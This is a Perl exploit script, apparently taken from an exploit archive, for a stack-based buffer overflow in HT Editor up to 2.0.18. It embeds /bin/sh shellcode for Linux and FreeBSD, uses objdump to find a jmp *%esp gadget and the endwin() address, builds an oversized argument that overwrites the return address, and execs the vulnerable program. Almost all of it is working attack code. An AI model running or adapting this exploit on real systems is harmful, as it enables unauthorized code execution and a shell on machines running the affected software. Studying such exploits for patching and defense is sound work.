96 lines
No EOL
2.2 KiB
Perl
Executable file
96 lines
No EOL
2.2 KiB
Perl
Executable file
# Exploit Title: HT Editor File openning Stack Overflow (0day)
|
|
# Date: March 30th 2011
|
|
# Author: ZadYree
|
|
# Software Link: http://hte.sourceforge.net/downloads.html
|
|
# Version: <= 2.0.18
|
|
# Tested on: Linux/Windows (buffer padding may differ on W32)
|
|
# CVE : None
|
|
#!/usr/bin/perl
|
|
=head1 TITLE
|
|
|
|
HT Editor <=2.0.18 0day Stack-Based Overflow Exploit
|
|
|
|
|
|
=head1 DESCRIPTION
|
|
|
|
The vulnerability is triggered by a too large argument (+ path) which simply lets you overwrite eip.
|
|
|
|
|
|
=head2 AUTHOR
|
|
|
|
ZadYree ~ 3LRVS Team
|
|
|
|
|
|
=head3 SEE ALSO
|
|
|
|
ZadYree's blog: z4d.tuxfamily.org
|
|
|
|
3LRVS blog: 3lrvs.tuxfamily.org
|
|
|
|
Shellcodes based on
|
|
http://www.shell-storm.org/shellcode/files/shellcode-606.php
|
|
http://www.shell-storm.org/shellcode/files/shellcode-171.php
|
|
|
|
=> Thanks
|
|
=cut
|
|
use 5.010;
|
|
|
|
my ($esp, $retaddr);
|
|
my $scz = [ "\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e" .
|
|
"\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8" .
|
|
"\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67" .
|
|
"\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30" .
|
|
"\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4" .
|
|
"\x53\x52\x54\x8a\xe2\xce\x81",
|
|
"\xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b" .
|
|
"\x08\x89\x43\x0c\x50\x8d\x53\x08\x52\x53" .
|
|
"\xb0\x3b\x50\xcd\x80\xe8\xe4\xff\xff\xff" .
|
|
"/bin/sh" ];
|
|
|
|
say'[*]Looking for $esp and endwin()...';
|
|
|
|
my $namez = [qw#/usr/bin/hte /usr/local/bin/ht#];
|
|
|
|
my $infos = get_infos(qx{uname});
|
|
|
|
my $name = $infos->[0];
|
|
|
|
|
|
say '[+]endwin() address found! (0x', $infos->[3],')';
|
|
|
|
for my $line(qx{objdump -D $name | grep "ff e4"}) {
|
|
$esp = "0" . $1, last if ($line =~ m{([a-f0-9]{7}).+jmp\s{4}\*%esp});
|
|
}
|
|
|
|
say '[+]$esp place found! (0x', $esp, ")\012Now exploiting...";
|
|
|
|
my @payload = ($infos->[0], ("A" x ($infos->[1] - length(qx{pwd}))) . reverse(pack('H*', $infos->[3])) . reverse(pack('H*', $esp)) . $infos->[2]);
|
|
exec(@payload);
|
|
|
|
|
|
sub get_infos {
|
|
given(shift) {
|
|
when(/Linux/) {
|
|
return([$namez->[0], 4108, $scz->[0], getendwin("linux")]);
|
|
}
|
|
when(/FreeBSD/) {
|
|
return([$namez->[1], 271, $scz->[1], getendwin("freebsd")]);
|
|
}
|
|
#Possibility to add friends ^^
|
|
}
|
|
}
|
|
|
|
sub getendwin {
|
|
given(shift) {
|
|
when("linux") {
|
|
my $n = $namez->[0];
|
|
for (qx{objdump -d $n | grep endwin}) {
|
|
$retaddr = $1, last if ($_ =~ m{(.*) <});
|
|
}
|
|
return($retaddr);
|
|
}
|
|
when("freebsd") {
|
|
return("282c2990");
|
|
}
|
|
}
|
|
} |